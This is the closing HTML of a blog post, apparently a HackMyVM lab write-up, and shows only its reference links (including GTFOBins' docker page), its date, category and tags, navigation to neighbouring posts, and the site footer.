  <li><a href="https://arabunaa.blogspot.com/2019/07/pengertian-taukid-dalam-ilmu-nahwu.html">https://arabunaa.blogspot.com/2019/07/pengertian-taukid-dalam-ilmu-nahwu.html</a></li>
  <li><a href="https://gtfobins.github.io/gtfobins/docker/">https://gtfobins.github.io/gtfobins/docker/</a></li>
  <li><a href="https://www.redhat.com/en/topics/containers/what-is-docker">https://www.redhat.com/en/topics/containers/what-is-docker</a></li>
</ul>

  </div>
  <div class="post-info" style="padding-top: 25px">
    <div class="post-date">
      2021-05-12.
    </div>
    <div class="post-categories">
      <span></span>
      
      <a href="/category/hackmyvm" class="post-category">hackmyvm</a>
      
    </div>
    <div class="post-tags">
      <span></span>
      
      <a href="/tag/mis-config" class="post-tag">mis-config</a>
      
      <a href="/tag/docker" class="post-tag">docker</a>
      
      <a href="/tag/gtfobins" class="post-tag">gtfobins</a>
      
      <a href="/tag/ftp" class="post-tag">ftp</a>
      
    </div>
    <div class="post-tools">
      
      <div>
        <span></span><a href="/2021/05/13/hmv-connection">HackMyVM: Connection</a>
      </div>
      
      
      <div>
        <span></span><a href="/2021/05/12/hmv-gift">HackMyVM: Gift</a>
      </div>
      
    </div>
    
  </div>
</article>

    </main>
    <footer class="container-footer">
      <div class="footer-copyright">
  <span class="footer-copyright-text float-left">Copyright &copy; 2022.  sharpicx.</span>
  <span class="footer-copyright-text float-right">
    Powered by <a href="https://jekyllrb.com/">Jekyll</a>
  </span>
</div>

    </footer>
  </div>
</body>
</html>